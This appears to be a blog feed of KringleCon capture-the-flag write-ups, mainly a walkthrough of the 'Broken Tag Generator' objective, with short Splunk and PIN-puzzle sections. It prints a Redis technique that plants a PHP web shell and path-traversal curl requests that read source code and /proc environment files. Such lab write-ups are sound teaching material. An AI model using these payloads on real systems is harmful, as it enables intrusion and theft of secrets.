&lt;span class="p">|&lt;/span> &lt;span class="nb">eval&lt;/span> &lt;span class="nv">results&lt;/span> &lt;span class="o">=&lt;/span> spath&lt;span class="o">(&lt;/span>_raw, &lt;span class="s2">&amp;#34;results{}&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="p">|&lt;/span> mvexpand results
&lt;span class="p">|&lt;/span> &lt;span class="nb">eval&lt;/span> &lt;span class="nv">path&lt;/span>&lt;span class="o">=&lt;/span>spath&lt;span class="o">(&lt;/span>results, &lt;span class="s2">&amp;#34;archivers.filedir.path&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>, &lt;span class="nv">filename&lt;/span>&lt;span class="o">=&lt;/span>spath&lt;span class="o">(&lt;/span>results, &lt;span class="s2">&amp;#34;payload_meta.extra_data.filename&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>, &lt;span class="nv">fullpath&lt;/span>&lt;span class="o">=&lt;/span>path.&lt;span class="s2">&amp;#34;/&amp;#34;&lt;/span>.filename
&lt;span class="p">|&lt;/span> search fullpath!&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;&amp;#34;&lt;/span>
&lt;span class="p">|&lt;/span> table filename,fullpath
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The final hint from Alice will definitely lead you to the file that you need to answer the question. Can you get it?&lt;/p>
&lt;blockquote>
&lt;p>Last thing for you today: Did you know that modern Word documents are (at their core) nothing more than a bunch of .xml files?&lt;/p>
&lt;/blockquote>
&lt;p>Of course it is the &lt;strong>core.xml&lt;/strong>. The Splunk search she gave you shows that its path is: &lt;code>/home/ubuntu/archive/f/f/1/e/a/ff1ea6f13be3faabd0da728f514deb7fe3577cc4/core.xml&lt;/code>. So now you just need to navigate to this file in the File Archive, download it and peek inside:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-xml" data-lang="xml">&lt;span class="cp">&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34; standalone=&amp;#34;yes&amp;#34;?&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;cp:coreProperties&lt;/span> &lt;span class="na">xmlns:cp=&lt;/span>&lt;span class="s">&amp;#34;http://schemas.openxmlformats.org/package/2006/metadata/core-properties&amp;#34;&lt;/span>
&lt;span class="na">xmlns:dc=&lt;/span>&lt;span class="s">&amp;#34;http://purl.org/dc/elements/1.1/&amp;#34;&lt;/span> &lt;span class="na">xmlns:dcterms=&lt;/span>&lt;span class="s">&amp;#34;http://purl.org/dc/terms/&amp;#34;&lt;/span>
&lt;span class="na">xmlns:dcmitype=&lt;/span>&lt;span class="s">&amp;#34;http://purl.org/dc/dcmitype/&amp;#34;&lt;/span>
&lt;span class="na">xmlns:xsi=&lt;/span>&lt;span class="s">&amp;#34;http://www.w3.org/2001/XMLSchema-instance&amp;#34;&lt;/span>&lt;span class="nt">&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dc:title&amp;gt;&lt;/span>Holiday Cheer Assignment&lt;span class="nt">&amp;lt;/dc:title&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dc:subject&amp;gt;&lt;/span>19th Century Cheer&lt;span class="nt">&amp;lt;/dc:subject&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dc:creator&amp;gt;&lt;/span>Bradly Buttercups&lt;span class="nt">&amp;lt;/dc:creator&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;cp:keywords&amp;gt;&amp;lt;/cp:keywords&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dc:description&amp;gt;&lt;/span>Kent you are so unfair. And we were going to make you the king of the Winter Carnival.&lt;span class="nt">&amp;lt;/dc:description&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;cp:lastModifiedBy&amp;gt;&lt;/span>Tim Edwards&lt;span class="nt">&amp;lt;/cp:lastModifiedBy&amp;gt;&amp;lt;cp:revision&amp;gt;&lt;/span>4&lt;span class="nt">&amp;lt;/cp:revision&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dcterms:created&lt;/span> &lt;span class="na">xsi:type=&lt;/span>&lt;span class="s">&amp;#34;dcterms:W3CDTF&amp;#34;&lt;/span>&lt;span class="nt">&amp;gt;&lt;/span>2019-11-19T14:54:00Z&lt;span class="nt">&amp;lt;/dcterms:created&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dcterms:modified&lt;/span> &lt;span class="na">xsi:type=&lt;/span>&lt;span class="s">&amp;#34;dcterms:W3CDTF&amp;#34;&lt;/span>&lt;span class="nt">&amp;gt;&lt;/span>2019-11-19T17:50:00Z&lt;span class="nt">&amp;lt;/dcterms:modified&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;cp:category&amp;gt;&amp;lt;/cp:category&amp;gt;&amp;lt;/cp:coreProperties&amp;gt;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>You will find the secret message to Kent within the &lt;strong>&amp;lt;dc:description&amp;gt;&lt;/strong> tag:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Kent you are so unfair. And we were going to make you the king of the Winter Carnival.
&lt;/code>&lt;/pre>&lt;/div></description></item><item><title>Broken Tag Generator</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective8/</link><pubDate>Thu, 24 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective8/</guid><description>&lt;p>&lt;img src="../images/obj8/objective8.png" alt="Objective8">&lt;/p>
&lt;p>Now that Santa&amp;rsquo;s sleigh&amp;rsquo;s CAN-D-BUS issue is fixed it&amp;rsquo;s time to move on to Objective 8 for fixing the KringleCon Tag Generator in the Wrapping Room. First, I head to the Kitchen to talk with &lt;code>Holly Evergreen&lt;/code> who is ready to trade some hints for my help with the Redis terminal:&lt;/p>
&lt;p>&lt;img src="../images/obj8/holly-evergreen.png" alt="Holly Evergreen">&lt;/p>
&lt;blockquote>
&lt;p>Hi Santa!
If you have a chance, I&amp;rsquo;d love to get your feedback on the Tag Generator updates!
I&amp;rsquo;m a little concerned about the file upload feature, but Noel thinks it will be fine.&lt;/p>
&lt;/blockquote>
&lt;p>Clicking the Redis terminal next to her will bring up a shell window. After some inspection the task at hand is more or less clear: I need to exfiltrate the &lt;code>index.php&lt;/code> file from the server on localhost using &lt;code>maintenance.php&lt;/code>. This endpoint accepts a &lt;strong>cmd&lt;/strong> parameter whose value is passed to redis-cli for execution.&lt;/p>
&lt;p>To start, I query the entire Redis config with the below command (which is then filtered for just the password):&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="hl">&lt;span class="ln">1&lt;/span>player@100dfcdfbca2:~$ curl http://localhost/maintenance.php?cmd&lt;span class="o">=&lt;/span>CONFIG,GET,* 2&amp;gt;/dev/null &lt;span class="p">|&lt;/span> grep pass -A &lt;span class="m">3&lt;/span>
&lt;/span>&lt;span class="ln">2&lt;/span>Running: redis-cli --raw -a &lt;span class="s1">&amp;#39;&amp;lt;password censored&amp;gt;&amp;#39;&lt;/span> &lt;span class="s1">&amp;#39;CONFIG&amp;#39;&lt;/span> &lt;span class="s1">&amp;#39;GET&amp;#39;&lt;/span> &lt;span class="s1">&amp;#39;*&amp;#39;&lt;/span>
&lt;span class="ln">3&lt;/span>dbfilename
&lt;span class="ln">4&lt;/span>dump.rdb
&lt;span class="ln">5&lt;/span>requirepass
&lt;span class="hl">&lt;span class="ln">6&lt;/span>R3disp@ss &lt;span class="o">&amp;lt;&amp;lt;&amp;lt;&lt;/span> Will be very handy to start a &lt;span class="nb">local&lt;/span> redis-cli session with privileges!
&lt;/span>&lt;span class="ln">7&lt;/span>masterauth
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next, I looked around the internet for Redis vulnerabilities involving local file access and found
&lt;a href="https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#redis-rce" target="_blank" rel="noopener">THIS&lt;/a> link which has a section on &lt;strong>Redis RCE&lt;/strong> vulnerability. While that example did not work straight out of the box, it pointed me to the right direction which eventually led me to the below exploit (inspired by
&lt;a href="https://medium.com/@eDodo90/writeup-hack-the-box-reddish-9f99cec8e1be" target="_blank" rel="noopener">this&lt;/a> source) submitted via the &lt;code>redis-cli&lt;/code> using the previously obtained password:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;CONFIG SET dir /var/www/html&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> redis-cli -a R3disp@ss
&lt;span class="ln">2&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;CONFIG SET dbfilename exfil.php&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> redis-cli -a R3disp@ss
&lt;span class="hl">&lt;span class="ln">3&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;SET PAYLOAD \&amp;#34;&amp;lt;?php system(\$_GET[&amp;#39;cmd&amp;#39;]); ?&amp;gt;\&amp;#34;&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> redis-cli -a R3disp@ss
&lt;/span>&lt;span class="ln">4&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;BGSAVE&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> redis-cli -a R3disp@ss
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Finally, to exfiltrate the &lt;code>index.php&lt;/code> I execute a simple cURL command:&lt;/p>
&lt;p>&lt;img src="../images/obj8/redis-bug.png" alt="Redis-Exfil">&lt;/p>
&lt;p>Now that the redis bug is discovered, I can get the promised hints from &lt;code>Holly&lt;/code>:&lt;/p>
&lt;blockquote>
&lt;p>Sorry to be a pest Santa, but could you look at the Tag Generator?
I&amp;rsquo;ve been looking at it, and I wonder if the source code would provide more insight?
I told Noel we should be more careful about disclosing information in error messages.
I tried what you suggested and enumerating all endpoints really is a good idea to understand an application&amp;rsquo;s functionality.
Sometimes though, I find the Content-Type header hinders the browser more than it helps.
Blind command injection can be frustrating though. Do you think output redirection would help?&lt;/p>
&lt;/blockquote>
&lt;p>A few more hints also appeared in the badge afterwards:&lt;/p>
&lt;ul>
&lt;li>We might be able to find the problem if we can get source code!&lt;/li>
&lt;li>Can you figure out the path to the script? It&amp;rsquo;s probably on error pages!&lt;/li>
&lt;li>Once you know the path to the file, we need a way to download it!&lt;/li>
&lt;li>Is there an endpoint that will print arbitrary files?&lt;/li>
&lt;li>If you&amp;rsquo;re having trouble seeing the code, watch out for the Content-Type! Your browser might be trying to help (badly)!&lt;/li>
&lt;li>I&amp;rsquo;m sure there&amp;rsquo;s a vulnerability in the source somewhere&amp;hellip; surely Jack wouldn&amp;rsquo;t leave their mark?&lt;/li>
&lt;li>If you find a way to execute code blindly, I bet you can redirect to a file then download that file!&lt;/li>
&lt;li>Remember, the processing happens in the background so you might need to wait a bit after exploiting but before grabbing the output!&lt;/li>
&lt;/ul>
&lt;p>Now it&amp;rsquo;s time to head to the Wrapping Room to talk with &lt;code>Noel&lt;/code>:&lt;/p>
&lt;p>&lt;img src="../images/obj8/noel-boetie.png" alt="Noel Boetie">&lt;/p>
&lt;blockquote>
&lt;p>Welcome to the Wrapping Room, Santa!
The tag generator is acting up.
I feel like the issue has something to do with weird files being uploaded.
Can you help me figure out what&amp;rsquo;s wrong?&lt;/p>
&lt;/blockquote>
&lt;p>The application in question is available via this
&lt;a href="https://tag-generator.kringlecastle.com" target="_blank" rel="noopener">LINK&lt;/a>:&lt;/p>
&lt;p>&lt;img src="../images/obj8/tag-generator.png" alt="Tag-Generator Web App">&lt;/p>
&lt;p>It seems to be a simple web application that is used to build name tags: you upload some graphics, add your own text, and download the result. I proceed to inspect its source more closely, to see what it takes to break it&amp;hellip; 😇&lt;/p>
&lt;p>Since both elves mentioned the file-upload part which may be problematic, I started playing with that to see how it worked:&lt;/p>
&lt;ul>
&lt;li>when trying to upload a &lt;strong>5.2 MB pdf&lt;/strong> file, it came back with &lt;code>413 Request Entity Too Large&lt;/code>, so the size limit is enforced server-side with no client-side verification.&lt;/li>
&lt;li>when uploading a &lt;strong>smaller text&lt;/strong> file it came back with &lt;code>Something went wrong!&lt;/code> and a more useful error message:&lt;/li>
&lt;/ul>
&lt;p>&lt;img src="../images/obj8/verbose-error-msg.png" alt="Verbose-Tag-Generator Error">&lt;/p>
&lt;p>This helps me identify that the source code handling the incoming requests is located at &lt;code>/app/lib/app.rb&lt;/code>, which is going to be very useful later on. The earlier hints mention that it should be possible to download this file through one of the API endpoints; I figured this would be the result of some sort of Local File Inclusion (&lt;code>LFI&lt;/code>) vulnerability. To look for this endpoint, I examine the image upload functionality more closely by uploading a valid &lt;strong>png&lt;/strong> image while observing the network requests in the Network tab of the developer console:&lt;/p>
&lt;p>&lt;img src="../images/obj8/upload-tag-generator.png" alt="TAG Generator - Upload">&lt;/p>
&lt;p>I notice that the first request goes to the &lt;code>/upload&lt;/code> endpoint. Once complete, the image is saved on the server and assigned a UUID, which is returned in the response. Next, there is a new request for the same image UUID via this other API endpoint: &lt;code>/image?id=&amp;lt;Random-UUID&amp;gt;.png&lt;/code>, which fetches the image from the server to display it. I take note of this and then decide to read more about LFI vulnerabilities in web applications. One especially useful resource is the OWASP article on
&lt;a href="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include" target="_blank" rel="noopener">Testing Directory Traversal File Include&lt;/a>. Using this new information, I fire up a terminal on my laptop and use cURL to craft some test requests to this &lt;code>/image&lt;/code> endpoint to see what kind of response comes back. On the very first try it looks quite promising:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>▶ curl https://tag-generator.kringlecastle.com/image?id&lt;span class="o">=&lt;/span>
&lt;span class="ln">2&lt;/span>&amp;lt;h1&amp;gt;Something went wrong!&amp;lt;/h1&amp;gt;
&lt;span class="hl">&lt;span class="ln">3&lt;/span>&amp;lt;p&amp;gt;Error in /app/lib/app.rb: Is a directory @ io_fread - /tmp/&amp;lt;/p&amp;gt;
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The error message after sending an empty &lt;code>id&lt;/code> parameter reveals quite a lot! It shows that a &lt;strong>Local File Inclusion / Directory Traversal&lt;/strong> exploit is possible through this endpoint. Also, it shows that uploads are stored in the &lt;code>/tmp/&lt;/code> directory.&lt;/p>
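&lt;p>The traversal works because the server opens &lt;code>/tmp/&lt;/code> plus the &lt;code>id&lt;/code> parameter, so a relative &lt;code>id&lt;/code> simply walks out of the upload directory. The path resolution can be checked locally (assuming GNU &lt;code>realpath&lt;/code>):&lt;/p>

```shell
# The server reads "/tmp/" + id; a relative id escapes the uploads directory
id='../app/lib/app.rb'
realpath -m "/tmp/${id}"   # prints /app/lib/app.rb
```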
&lt;p>&lt;strong>Note&lt;/strong> that it is essential to use cURL instead of the browser because the API response always has the &lt;code>Content-Type: image/jpeg&lt;/code> header set, which causes browsers to interpret the payload as an image.&lt;/p>
&lt;p>Finally, I use the intel I gathered to successfully retrieve the Ruby source code of the Web Application:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="hl">&lt;span class="ln">1&lt;/span>▶ curl https://tag-generator.kringlecastle.com/image?id&lt;span class="o">=&lt;/span>../app/lib/app.rb
&lt;/span>&lt;span class="ln">2&lt;/span>&lt;span class="c1"># encoding: ASCII-8BIT&lt;/span>
&lt;span class="ln">3&lt;/span>
&lt;span class="ln">4&lt;/span>&lt;span class="nv">TMP_FOLDER&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;/tmp&amp;#39;&lt;/span>
&lt;span class="ln">5&lt;/span>&lt;span class="nv">FINAL_FOLDER&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;/tmp&amp;#39;&lt;/span>
&lt;span class="ln">6&lt;/span>
&lt;span class="ln">7&lt;/span>&lt;span class="c1"># Don&amp;#39;t put the uploads in the application folder&lt;/span>
&lt;span class="ln">8&lt;/span>Dir.chdir TMP_FOLDER
&lt;span class="ln">9&lt;/span>...
&lt;/code>&lt;/pre>&lt;/div>&lt;p>After fetching the
&lt;a href="../files/obj8/app.rb">file&lt;/a> I examine it closer to see if I can find more clues for retrieving the contents of the &lt;code>GREETZ&lt;/code> env variable. In fact, there are some commented lines from &lt;strong>Jack&lt;/strong> in the &lt;code>handle_zip&lt;/code> function that look promising:&lt;/p>
&lt;pre>&lt;code># I wonder what this will do? --Jack
# if entry.name !~ /^[a-zA-Z0-9._-]+$/
# raise 'Invalid filename! Filenames may contain letters, numbers, period, underscore, and hyphen'
# end
&lt;/code>&lt;/pre>&lt;p>Eventually, I give up trying to figure out how to turn this to my advantage. Nevertheless, I am still able to exfil the ENV variable via the same LFI vulnerability that allowed me to extract the Ruby source code.&lt;/p>
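&lt;p>For context, the commented-out check matters because zip entry names may contain path separators and &lt;code>..&lt;/code> sequences, the classic zip-slip pattern. A minimal Python sketch of what the regex from the comment accepts and rejects (the entry names are hypothetical):&lt;/p>

```python
import re

# The filename whitelist from Jack's commented-out check in app.rb
SAFE_NAME = re.compile(r'^[a-zA-Z0-9._-]+$')

# Hypothetical zip entry names: with the check disabled, the last two
# could be written outside the extraction directory (zip-slip)
entries = ['photo.jpg', 'my_tag-v2.png', '../../app/lib/app.rb', '/etc/passwd']

for name in entries:
    verdict = 'accepted' if SAFE_NAME.match(name) else 'REJECTED'
    print(f'{name}: {verdict}')
```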
&lt;p>I achieve this by remembering that
&lt;a href="http://www.dba-oracle.com/linux/important_files_directories.htm" target="_blank" rel="noopener">everything is a file in Linux&lt;/a>. I first try to extract &lt;code>/etc/environment&lt;/code> which is just plain empty. Then I recall that every process has its own &lt;code>/proc/PID/environ&lt;/code> file for storing ENV vars, so I try to guess the PID of the Web App and to my big surprise I get it right on the first try:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="hl">&lt;span class="ln"> 1&lt;/span>▶ curl https://tag-generator.kringlecastle.com/image?id&lt;span class="o">=&lt;/span>../proc/1/environ --output -
&lt;/span>&lt;span class="ln"> 2&lt;/span>&lt;span class="nv">PATH&lt;/span>&lt;span class="o">=&lt;/span>/usr/local/bundle/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
&lt;span class="ln"> 3&lt;/span>&lt;span class="nv">HOSTNAME&lt;/span>&lt;span class="o">=&lt;/span>cbf2810b7573
&lt;span class="ln"> 4&lt;/span>&lt;span class="nv">RUBY_MAJOR&lt;/span>&lt;span class="o">=&lt;/span>2.7
&lt;span class="ln"> 5&lt;/span>&lt;span class="nv">RUBY_VERSION&lt;/span>&lt;span class="o">=&lt;/span>2.7.0
&lt;span class="ln"> 6&lt;/span>&lt;span class="nv">RUBY_DOWNLOAD_SHA256&lt;/span>&lt;span class="o">=&lt;/span>27d350a52a02b53034ca0794efe518667d558f152656c2baaf08f3d0c8b02343
&lt;span class="ln"> 7&lt;/span>&lt;span class="nv">GEM_HOME&lt;/span>&lt;span class="o">=&lt;/span>/usr/local/bundle
&lt;span class="ln"> 8&lt;/span>&lt;span class="nv">BUNDLE_SILENCE_ROOT_WARNING&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">1&lt;/span>
&lt;span class="ln"> 9&lt;/span>&lt;span class="nv">BUNDLE_APP_CONFIG&lt;/span>&lt;span class="o">=&lt;/span>/usr/local/bundleA
&lt;span class="ln">10&lt;/span>&lt;span class="nv">PP_HOME&lt;/span>&lt;span class="o">=&lt;/span>/app
&lt;span class="ln">11&lt;/span>&lt;span class="nv">PORT&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">4141HOST&lt;/span>&lt;span class="o">=&lt;/span>0.0.0.0
&lt;span class="hl">&lt;span class="ln">12&lt;/span>&lt;span class="nv">GREETZ&lt;/span>&lt;span class="o">=&lt;/span>JackFrostWasHere
&lt;/span>&lt;span class="ln">13&lt;/span>&lt;span class="nv">HOME&lt;/span>&lt;span class="o">=&lt;/span>/home/app
&lt;/code>&lt;/pre>&lt;/div>&lt;p>There it is, the solution to Objective 8: &lt;code>JackFrostWasHere&lt;/code>!&lt;/p>
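&lt;p>As a side note, some variables appear to run together (e.g. &lt;code>PORT=4141HOST=0.0.0.0&lt;/code>) because the entries in &lt;code>/proc/PID/environ&lt;/code> are separated by NUL bytes, which are invisible in terminal output. A small Python sketch for splitting such a dump cleanly (the sample bytes mimic the output above):&lt;/p>

```python
def parse_environ(raw: bytes) -> dict:
    """Split a /proc/<pid>/environ dump into a dict.

    Entries are NUL-separated KEY=VALUE pairs; the trailing NUL
    leaves an empty chunk, which we skip.
    """
    env = {}
    for chunk in raw.split(b'\x00'):
        if b'=' in chunk:
            key, _, value = chunk.partition(b'=')
            env[key.decode()] = value.decode()
    return env

# A shortened sample in the same NUL-separated format as the dump above
sample = b'PORT=4141\x00HOST=0.0.0.0\x00GREETZ=JackFrostWasHere\x00'
print(parse_environ(sample))
# → {'PORT': '4141', 'HOST': '0.0.0.0', 'GREETZ': 'JackFrostWasHere'}
```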
&lt;p>Quite unintentionally, I also find the same value saved to a TXT file at &lt;code>/tmp/greetz.txt&lt;/code>. At first, I think that it was left there by a fellow HHC contestant, but later on the HHC folks confirmed that it was indeed &lt;code>Jack&lt;/code> himself!&lt;/p>
&lt;p>Anyhow, on to the next one! 😎&lt;/p></description></item><item><title>The Steam Tunnels</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective7/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective7/</guid><description>&lt;h2 id="hack-that-trail">Hack that trail!&lt;/h2>
&lt;p>Instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>Gain access to the steam tunnels.
Who took the turtle doves? Please tell us their first and last name.
For hints on achieving this objective, please visit Minty&amp;rsquo;s dorm room and talk with Minty Candy Cane.&lt;/p>
&lt;/blockquote>
&lt;p>You are told you can find hints in the dorm, so you head there, but before you can enter, you need to crack the PIN at the entrance. Luckily, there is an Elf ready to provide some hints for this:&lt;/p>
&lt;p>&lt;img src="../images/obj7-dorm.png" alt="Dorm Entrance">&lt;/p>
&lt;blockquote>
&lt;p>Hey kid, it&amp;rsquo;s me, Tangle Coalbox.
I&amp;rsquo;m sleuthing again, and I could use your help.
Ya see, this here number lock&amp;rsquo;s been popped by someone.
I think I know who, but it&amp;rsquo;d sure be great if you could open this up for me.
I&amp;rsquo;ve got a few clues for you.&lt;/p>
&lt;ol>
&lt;li>One digit is repeated once.&lt;/li>
&lt;li>The code is a prime number.&lt;/li>
&lt;li>You can probably tell by looking at the keypad which buttons are used.&lt;/li>
&lt;/ol>
&lt;/blockquote>
&lt;p>To find all the primes that adhere to these constraints, I wrote a small Python script that produced the candidates below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="m">1307&lt;/span>
&lt;span class="m">1373&lt;/span>
&lt;span class="m">1733&lt;/span>
&lt;span class="m">3137&lt;/span>
&lt;span class="m">3371&lt;/span>
&lt;span class="m">3701&lt;/span>
&lt;span class="m">7013&lt;/span>
&lt;span class="m">7103&lt;/span>
&lt;span class="m">7331&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Then I tried the numbers starting from the bottom of the list, and the very first one opened the door. So finally you are in the dorm, where you notice the same PIN written on the wall&amp;hellip; :D&lt;/p>
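&lt;p>A script like the one I used can be sketched as follows. It assumes the worn-looking buttons on the keypad were &lt;strong>0&lt;/strong>, &lt;strong>1&lt;/strong>, &lt;strong>3&lt;/strong> and &lt;strong>7&lt;/strong>, so the code is a four-digit prime drawn from the permutations of either 1-3-3-7 (one digit repeated) or 0-1-3-7; filtering for primes reproduces the candidate list above:&lt;/p>

```python
from itertools import permutations

def is_prime(n: int) -> bool:
    """Trial division is plenty for 4-digit numbers."""
    if n < 2:
        return False
    for d in range(2, int(n ** 0.5) + 1):
        if n % d == 0:
            return False
    return True

# Either one of the worn digits 1/3/7 repeats, or 0 is the fourth button
candidates = set()
for digits in ((1, 3, 3, 7), (0, 1, 3, 7)):
    for perm in permutations(digits):
        if perm[0] == 0:  # a 4-digit code has no leading zero
            continue
        n = int(''.join(map(str, perm)))
        if is_prime(n):
            candidates.add(n)

for n in sorted(candidates):
    print(n)
# → 1307 1373 1733 3137 3371 3701 7013 7103 7331
```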
&lt;p>&lt;img src="../images/obj7-dorm2.png" alt="Splunk Interface">&lt;/p>
&lt;p>Some hint from Minty:&lt;/p>
&lt;blockquote>
&lt;p>Hi! I&amp;rsquo;m Minty Candycane!
I just LOVE this old game!
I found it on a 5 1/4&amp;rdquo; floppy in the attic.
You should give it a go!
If you get stuck at all, check out this year&amp;rsquo;s talks.
One is about web application penetration testing.
Good luck, and don&amp;rsquo;t get dysentery!&lt;/p>
&lt;/blockquote>
&lt;p>So if you click on the Terminal, it opens a browser frame with a game called &lt;strong>The Holiday Hack Trail&lt;/strong>, which you are tasked to solve. There are 3 modes: &lt;strong>Easy&lt;/strong>, &lt;strong>Medium&lt;/strong> and &lt;strong>Hard&lt;/strong>. As you increase the difficulty, you need to solve the same problem with fewer and fewer resources (money). On Easy mode it was rather trivial, on Medium it needed some effort, while on Hard I am not sure it is possible to solve without some hacking. Instructions on the starting screen:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-text" data-lang="text">It&amp;#39;s nearly time for Kringlecon.
You need to get there before the 25th day of December!
Hitch up your reindeer, gather your supplies, and do your best to make it to the North Pole on time.
Good luck!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>If you select Easy mode, you will notice that the URL contains a bunch of parameters. Apparently, the game in this mode is controlled via URL parameters, which are easy to mess with:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">hhc://trail.hhc/store/?difficulty&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">distance&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">money&lt;/span>&lt;span class="o">=&lt;/span>5000&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">pace&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">curmonth&lt;/span>&lt;span class="o">=&lt;/span>7&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">curday&lt;/span>&lt;span class="o">=&lt;/span>1&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">reindeer&lt;/span>&lt;span class="o">=&lt;/span>2&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">runners&lt;/span>&lt;span class="o">=&lt;/span>2&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">ammo&lt;/span>&lt;span class="o">=&lt;/span>100&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">meds&lt;/span>&lt;span class="o">=&lt;/span>20&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">food&lt;/span>&lt;span class="o">=&lt;/span>400&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">name0&lt;/span>&lt;span class="o">=&lt;/span>Ryan&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">health0&lt;/span>&lt;span class="o">=&lt;/span>100&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cond0&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">causeofdeath0&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathday0&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathmonth0&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">name1&lt;/span>&lt;span class="o">=&lt;/span>Vlad&lt;span 
class="p">&amp;amp;&lt;/span>&lt;span class="nv">health1&lt;/span>&lt;span class="o">=&lt;/span>100&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cond1&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">causeofdeath1&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathday1&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathmonth1&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">name2&lt;/span>&lt;span class="o">=&lt;/span>Jane&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">health2&lt;/span>&lt;span class="o">=&lt;/span>100&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cond2&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">causeofdeath2&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathday2&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathmonth2&lt;/span>&lt;span 